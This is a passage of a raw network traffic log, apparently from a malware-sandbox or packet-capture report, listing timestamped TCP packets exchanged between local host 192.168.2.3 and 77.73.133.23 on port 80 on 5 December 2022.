Dec 5, 2022 01:32:57.058468103 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058485985 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058501959 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058516979 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058536053 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058552027 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058569908 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058587074 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058604002 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058619022 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058639050 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058653116 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058672905 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058690071 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058708906 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058722019 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058743000 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058757067 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058779955 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058787107 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058815002 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058824062 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058849096 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058859110 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058896065 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058897972 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058933973 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058943033 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.058968067 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.058975935 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059003115 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059015036 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059037924 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059046030 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059072018 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059079885 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059107065 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059118986 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059140921 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059153080 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059175014 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059182882 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059209108 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059228897 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059242964 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059252977 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059277058 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059293032 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059312105 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059328079 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059346914 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059365034 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059380054 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059396029 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059413910 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059431076 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059448004 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059463978 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059489012 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059498072 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059524059 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059546947 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059557915 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059575081 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059592962 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059607983 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059627056 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059634924 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059660912 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059670925 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059695959 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059703112 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059730053 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059737921 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059763908 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059783936 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059801102 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059811115 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059834957 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059844971 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059870005 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059878111 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059904099 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059914112 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059937954 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059946060 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.059973001 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.059982061 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060008049 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060017109 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060040951 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060049057 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060075998 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060086966 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060111046 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060118914 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060147047 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060153961 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060180902 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060189962 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060215950 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060224056 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060250044 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060261011 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060285091 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060301065 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060318947 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060338020 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060353041 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060369015 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060386896 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060404062 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060420990 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060440063 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060456038 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060472012 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060489893 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060506105 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060523987 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060534954 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060558081 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060566902 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060592890 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060600042 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060627937 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060642004 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060663939 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060672998 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060703993 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060712099 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060739040 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060756922 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060775995 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060792923 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060810089 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060821056 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060843945 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060877085 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060889959 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060909986 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060942888 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060949087 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060961008 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.060977936 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.060987949 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.061012030 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.061024904 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.061045885 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.061057091 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.061079979 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.061089993 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.061114073 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.061122894 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.061147928 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.061156988 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.061182022 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.061192989 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.061217070 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.061227083 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.061260939 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.076513052 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.076824903 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.085320950 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.085442066 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.099756002 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.099845886 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.100369930 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.100416899 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.100450993 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.100456953 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.100500107 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.100505114 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.100522995 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.100539923 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.100554943 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.100581884 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.100595951 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.100621939 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.100635052 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.100663900 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.100672007 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.100711107 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.100732088 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.100750923 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.100795984 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.100809097 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.100838900 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.100874901 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.100878954 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.100897074 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.100919962 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.100931883 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.100960970 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.100974083 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101002932 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101011038 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101044893 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101062059 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101085901 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101098061 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101126909 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101134062 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101166964 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101178885 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101207972 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101222992 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101248980 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101264000 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101289988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101305962 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101330996 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101358891 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101372957 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101392984 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101413965 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101448059 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101455927 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101471901 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101499081 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101521969 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101537943 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101552010 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101579905 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101598978 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101619959 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101640940 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101660967 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101680040 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101702929 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101722956 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101743937 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101762056 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101788044 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101799965 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101830006 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101845026 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101870060 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101887941 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101911068 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101923943 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101952076 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.101967096 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.101993084 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102010012 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102035046 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102054119 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102075100 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102094889 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102116108 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102135897 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102157116 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102174044 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102196932 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102212906 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102236986 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102261066 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102277040 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102298975 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102319002 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102339983 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102361917 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102382898 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102401972 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102425098 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102442980 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102483034 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102509022 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102509022 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102521896 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102562904 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102576971 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102602959 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102616072 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102663040 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102675915 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102704048 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102718115 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102745056 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102771044 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102787971 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102813959 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102829933 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102871895 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102937937 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.102941990 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102941990 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.102981091 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103004932 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103022099 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103035927 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103065014 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103105068 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103117943 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103144884 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103156090 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103185892 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103198051 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103226900 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103236914 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103269100 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103285074 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103312016 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103341103 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103352070 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103377104 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103391886 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103434086 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103439093 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103473902 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103480101 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103501081 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103513956 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103528976 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103557110 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103573084 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103600025 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103607893 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103642941 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103652954 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103683949 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103693008 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103724957 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103734016 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103765965 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103790045 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103811026 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103818893 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103852987 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103893042 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103921890 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103921890 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103934050 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103950977 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.103976011 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.103992939 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104016066 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104032993 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104057074 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104070902 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104099989 CET	80	49707	77.73.133.23	192.168.2.3
